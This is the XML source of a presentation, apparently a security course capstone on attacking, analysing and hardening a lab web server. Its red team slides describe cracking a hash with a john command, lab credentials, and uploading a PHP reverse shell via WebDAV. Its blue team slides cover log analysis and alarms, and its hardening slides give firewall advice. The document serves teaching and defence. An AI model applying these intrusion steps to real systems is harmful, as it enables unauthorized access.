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59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710E467-231A-5846-A2D1-F870600F7527}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Network Topology" id="{F31BADC0-6DE5-FE43-9593-B93043E822FC}">
          <p14:sldIdLst>
            <p14:sldId id="258"/>
            <p14:sldId id="259"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Red Team" id="{B3493FF6-D912-9A45-9E32-6BEEFE77D912}">
          <p14:sldIdLst>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
            <p14:sldId id="262"/>
            <p14:sldId id="263"/>
            <p14:sldId id="277"/>
            <p14:sldId id="265"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Blue Team" id="{7404BB10-CE21-3A40-89AF-F15D45290BD4}">
          <p14:sldIdLst>
            <p14:sldId id="266"/>
            <p14:sldId id="267"/>
            <p14:sldId id="268"/>
            <p14:sldId id="269"/>
            <p14:sldId id="270"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Hardening" id="{F829F2C5-9091-7443-972D-0B41A6E8BA29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37"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="149" d="100"/>
          <a:sy n="149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A251-676B-C04F-A8F4-850F3F0DC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D13E2-F401-A346-A2B3-92EE5CE4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B800-F335-9B4C-8119-F679CD24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1B00-A012-8446-8E6C-5AC28C27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7457-A143-3745-820B-04E9C729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CFF-1254-ED40-8C20-1F779B3D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F565-3550-EA40-A12B-5CAFF8D0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35DB-3E3D-D142-AEBD-3C32621D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95A9-2411-3744-9123-848F6A74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729E4-7BBC-224F-A314-57D8E7C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5123-4C59-E74A-8FA3-5FDD098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9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8CBB9B-4990-EB4B-AF3A-B4D5775AD9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45640" y="3620714"/>
            <a:ext cx="4636008" cy="384048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8E55CB0-DF25-FF4F-932B-6E31802B4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6094" y="2857630"/>
            <a:ext cx="4636008" cy="8321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343592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754-F451-2747-8621-CDBCC9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1108-71B7-524B-AC17-0E9E7B3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10515600" cy="42925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1FDF-DE86-8545-9D9A-D14F57EF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010-1818-C14D-BA2B-635CC98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E469-72BE-3B46-B294-901C50A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92D858-4E21-F848-97D3-EE5003C278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FC5143EC-96F5-684C-8C90-17946C05ACC1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14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1669-3FF1-1947-9263-154D16D0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33AE-4709-3F44-B980-A3A97972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985B-F33E-FC4E-B55D-6F3A1C82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1648-3178-6B4A-81E6-EA8398DD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0EE7-5F85-2442-953E-33382770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4C24-6B12-534B-8F49-FA336C9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2CB-F702-6046-A9E9-84657756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84435"/>
            <a:ext cx="5181600" cy="429252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4796-4BE2-D348-8B16-29479F3B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4435"/>
            <a:ext cx="5181600" cy="42925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E82C-50EF-814B-BE86-EBAC834F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91F3-F231-F94B-BA0C-A035733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BABD-E3FE-CE4F-8256-16EBC2A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oogle Shape;61;p8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0500E5BF-3D54-DB4D-98C6-B60DF2C9154F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3B6580-822E-134C-9F33-F2CA235DB5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5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arm_SystemHard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4C24-6B12-534B-8F49-FA336C9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2CB-F702-6046-A9E9-84657756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7215"/>
            <a:ext cx="5181600" cy="36597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4796-4BE2-D348-8B16-29479F3B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7215"/>
            <a:ext cx="5181600" cy="36597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E82C-50EF-814B-BE86-EBAC834F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91F3-F231-F94B-BA0C-A035733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BABD-E3FE-CE4F-8256-16EBC2A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oogle Shape;61;p8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0500E5BF-3D54-DB4D-98C6-B60DF2C9154F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3B6580-822E-134C-9F33-F2CA235DB5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oogle Shape;452;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B525EB-FE9B-4448-97ED-AC47A976E537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1957373"/>
            <a:ext cx="5181600" cy="476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1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" name="Google Shape;453;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{558B42FA-2C24-064F-A3A2-BA73C3FB8DD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6308395" y="2346161"/>
            <a:ext cx="261029" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtra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4;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82FC185A-C1B4-D246-A32F-7F6EA65FEBA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="893100" y="1956260"/>
            <a:ext cx="5126700" cy="47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" name="Google Shape;455;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7F9DFE5-73E4-0641-A083-B47F6CCF5F22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1011217" y="2345036"/>
            <a:ext cx="226486" cy="14469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2F16E-A75D-C84D-AAAE-66500584C37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56260"/>
            <a:ext cx="0" cy="4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ED80-3C6C-9946-B68D-9C7ADA6B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38ED-E8A3-E744-BEEB-90908C65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DCA9-6F0C-1540-B41A-7CD4234FB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0DD3-BC47-1B4A-A766-F6A57F46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216ED-763C-EF40-B733-7118A216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A56C0-9363-1548-9239-1D0B9DA4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7F342-6147-8D44-B13A-8EFF691A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8F626-90EF-2E4B-93DE-173F768E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1112A1BA-02B1-D342-A894-FB905B78E17E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1C7408-B240-8243-B093-F12E71695E9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5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5457-2F5B-A94F-B6F7-EEA1FD86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90656-26FF-8A4E-B2FE-C9A619FC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B1E8-0C6A-824A-BBC6-C0CA8A11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6859-C4AC-FE47-847F-CBC032D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61;p8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6BD40E1-38E7-1745-BB05-A4425376C815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32715A-F588-F24B-9CBC-DCA5B270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1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1CA9-4638-A242-8ABE-13994338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F101-5EA2-DC4C-B8FA-AA908E84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53BDE-6B7C-3643-809C-83FE2D7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46EE11C-E174-E944-A9CF-0A0D1F05FEEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4677196" y="1880282"/>
            <a:ext cx="6675120" cy="4292535"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 196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11754-F451-2747-8621-CDBCC9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1108-71B7-524B-AC17-0E9E7B3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3660972" cy="42925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1FDF-DE86-8545-9D9A-D14F57EF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010-1818-C14D-BA2B-635CC98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E469-72BE-3B46-B294-901C50A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92D858-4E21-F848-97D3-EE5003C278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FC5143EC-96F5-684C-8C90-17946C05ACC1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89EC49D-F739-434A-8983-86B8AE6FF1D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860076" y="2014869"/>
            <a:ext cx="6309360" cy="402336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7D0FA-AC26-BC46-8734-1BB511D0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F3E5-AD6C-D049-9520-4FA379C1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869E-9CC2-7A46-A32A-C495D9CD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99A3-2035-514A-9DFC-7B97BC4B827D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FB1A-CF32-FB46-8C28-11327462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375-7EB1-E647-8344-CE13F9195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BAE0-1EF2-1940-8654-5BC563223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61" r:id="rId9"/>
    <p:sldLayoutId id="2147483656" r:id="rId10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Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0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105-F3DF-D74B-A500-BEA4B2A388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161518" y="2235200"/>
            <a:ext cx="6030482" cy="23876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Capstone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28810-3944-F54E-8E9D-0F395F9DD2A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09204" y="3584947"/>
            <a:ext cx="4782796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Assessment, Analysis, and Hardening of a Vulnerable System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279931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F27B-83D5-B14C-8BDA-F5A3A51C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Exploitation: Unauthorized File Upload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1A9BC4-DCDA-9144-B266-23B951E4399E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="445406" y="1690617"/>
            <a:ext cx="3650372" cy="4802178"/>
            <a:chOff x="571107" y="1690642"/>
            <a:chExt cx="3650372" cy="4802178"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Google Shape;1091;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58CE8C8D-3BAE-5742-A8C4-15A9D07CF3EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="838199" y="2283313"/>
              <a:ext cx="3383280" cy="4209507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Tools &amp; Processes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WebDAV connection can be used to upload files to the Apache Webserver.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By reading the note contained in the company’s “secret” folder, we know the username is “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ryan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”, and a password hash.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By using the tool </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0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john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, we can crack this password hash and determine the plain-text password.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After determining the correct credentials, we can connect to the WebDAV server using the standard file browser and upload a php reverse-shell script.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Command to crack the password:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft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" name="Google Shape;1093;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2021632E-71F5-BD43-8D0C-DEBFB429F50A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="571107" y="1690642"/>
              <a:ext cx="533372" cy="533480"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="695400" cy="695450"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="Google Shape;1094;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B8084EE-DA09-CC4B-9F1C-C00ACB62B006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01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3" name="Google Shape;1095;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7470E06-A3E6-A847-865F-C139B8F753E0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EA1C28-7944-A04D-A834-72D575F8B964}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4270813" y="1690617"/>
            <a:ext cx="3650374" cy="4802128"/>
            <a:chOff x="4391833" y="1690692"/>
            <a:chExt cx="3650374" cy="4802128"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Google Shape;1096;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36101DDC-F959-344D-B664-410F55667F1D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4391833" y="1690692"/>
              <a:ext cx="533372" cy="533480"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="695400" cy="695450"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Google Shape;1097;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F0AF7AA-45FC-E74D-9727-5F2984469B8C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02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8" name="Google Shape;1098;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC9734F6-D1D1-EF43-98DF-4ECED488B920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6" name="Google Shape;1099;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD1F5A7D-7678-4A4E-A46E-4976C5BCB16E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4658927" y="2283364"/>
              <a:ext cx="3383280" cy="420945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400" b="1" dirty="0">
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Achievements</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="91440" lvl="0" indent="-9144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exploit provided us with the username (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ryan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) and password (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0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linux4u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) for the WebDAV server, which was used to upload a file to the server.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="91440" lvl="0" indent="-9144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 uploaded a php reverse-shell script, which gave us reverse-shell access to the server.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AB376C-7D9E-C940-BF40-80282283A6E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8096223" y="1690667"/>
            <a:ext cx="3650374" cy="4802078"/>
            <a:chOff x="8200117" y="1690642"/>
            <a:chExt cx="3650374" cy="4802078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Google Shape;1101;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF64FBF8-4339-054B-BE48-F07B434F8B5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8200117" y="1690642"/>
              <a:ext cx="533372" cy="533480"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="695400" cy="695450"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Google Shape;1102;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2D5B8F1-0801-B742-9A1E-572B0F14FBDE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03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3" name="Google Shape;1103;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F84EC5-033D-5F4B-B081-249FF4EA2BFB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" name="Google Shape;1104;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AB89495-9B36-1147-99F3-8734C5156BC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8467211" y="2283313"/>
              <a:ext cx="3383280" cy="4209407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400" b="1" dirty="0">
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Results</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="91440" indent="-9144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Screenshot showing the uploaded file:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr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endParaRPr lang="en-US" sz="1400" b="1" dirty="0"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577E1E6-162F-434B-BA64-38DFD8E76543}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957904" y="5759866"/>
            <a:ext cx="28924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Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>john --format=raw-md5 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ryan-hash.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"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C72827-47B2-1849-853C-C41AE1C0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477" y="3161173"/>
            <a:ext cx="3108960" cy="24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79C0E2-2908-1245-8A8D-06E8E6D28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 Analysis and Attack Characterization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48EE48-B224-AC40-B1CB-BB3A18D1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Team</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2108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8CAAF-C95B-5A40-AF00-D4F4E452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Analysis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0669A-D249-8D4F-B186-68AFFB03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3660972" cy="4292538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The port scan occurred on February 27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at 18:38:20.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the two minutes from 18:38 to 18:40, 590,181 packets were sent from the Kali machine (192.168.1.90) to 17 different destinations, on 1,003 ports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The fact that the attacker machine sent a high volume of packets to over 1,000 ports in the period of two minutes indicates this is a port scan.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9078F-F6BA-A141-BB2D-2039E9A7DB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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture Placeholder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29DCA731-4D69-B24D-BBA5-A2311029C37B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-15143" b="-15143"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203240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8CAAF-C95B-5A40-AF00-D4F4E45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85D0D2-E134-A14A-A853-B69906B8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request for the secret folder was made on February 27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at 18:40:51.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>12 total requests were made for the secret directory and files contained in the secret directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The file 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connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was requested and returned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This file contained instructions for connecting to the WebDAV server, as well as a username and password hash to use.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9078F-F6BA-A141-BB2D-2039E9A7DB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Finding the Request for the Hidden Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture Placeholder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58BB89C-634B-5A47-9361-598B41BFADAB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-14233" b="-14233"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36648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8CAAF-C95B-5A40-AF00-D4F4E45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305B9-B403-4745-83E1-63FAF599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brute force attack began on February 27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at 18:42:08.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>12,148 requests were made during the attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>12,142 requests were made before the password was correctly guessed.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9078F-F6BA-A141-BB2D-2039E9A7DB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Uncovering the Brute Force Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture Placeholder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0C69B8F-0E12-F141-9753-969FFA2B9197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-3802" b="-3802"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336464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8CAAF-C95B-5A40-AF00-D4F4E45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29766-DE40-4449-8A70-38B0E825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 total requests were made for the WebDAV directory (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/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webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The files 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passwd.dav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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US" dirty="0"/>
              <a:t>were requested.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request methods include the following: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PROPFIND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OPTIONS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9078F-F6BA-A141-BB2D-2039E9A7DB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Finding the WebDAV Connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture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9E594D5-7966-9C44-8292-6E4E820D91EF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-10460" b="-10460"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30581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4A9C65-9008-D44B-BC8D-C1849CEE6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Proposed Alarms and Mitigation Strategies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31B107-6BE7-9644-9179-682B0272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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253767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C7FC67-9511-AF4A-8E9C-16F728B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47A6325-EEE4-564A-A22B-2CE2DD7D50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What kind of alarm can be set to detect future port scans?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An alert could be set to trigger when any single IP address sends a high number of packets across a variety of ports.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If an attacker is using multiple IP addresses, an alert could be configured to trigger if a predefined number of closed ports are probed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1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What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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 possible threshold for this alert could be if any single IP address sends in excess of 100 packets to the range of privileged ports. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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If nmap encounters a closed port, the host responds with a RST packet. If more than 250 RST packets are sent to a given IP address in a single day, that traffic should be blocked.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E4F460B-5153-A047-AAB1-5DFEBD1F2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What configurations can be set on the host to mitigate port scans? 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The host should be configured with a deny-by-default firewall. The firewall should be configured to drop incoming disallowed traffic rather than send an RST packet. This slows nmap down, because nmap will wait for a worst-case timeout and try again. This is potentially very frustrating to potential attackers.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To set up a firewall, one could use the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"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200" dirty="0" err="1">
                <a:latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200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latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ufw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> default deny incoming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200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Even on ports that are blocked by the firewall, the ports should be closed (i.e., no application is listening). This is a tenet of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0">
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>defense-in-depth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>model. We should assume that a potential attacker will be able to breach the firewall and prepare accordingly.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2F027-37D7-FE4F-A3C9-D282329B813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Blocking the Port Scan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35341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C7FC67-9511-AF4A-8E9C-16F728B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2ACBADA-0DA3-B944-8B01-DCF467B53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kind of alarm can be set to detect future unauthorized access?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An alarm should be configured to trigger if any request is made to the hidden directory from outside the company’s internal network. The hidden directory is for company-only use and should not be accessible from outside the premises. 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Additionally, an alarm should trigger if sequential requests for the directory are made from a single IP address. An attacker could be probing the directory to see what is available, and that traffic should be blocked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
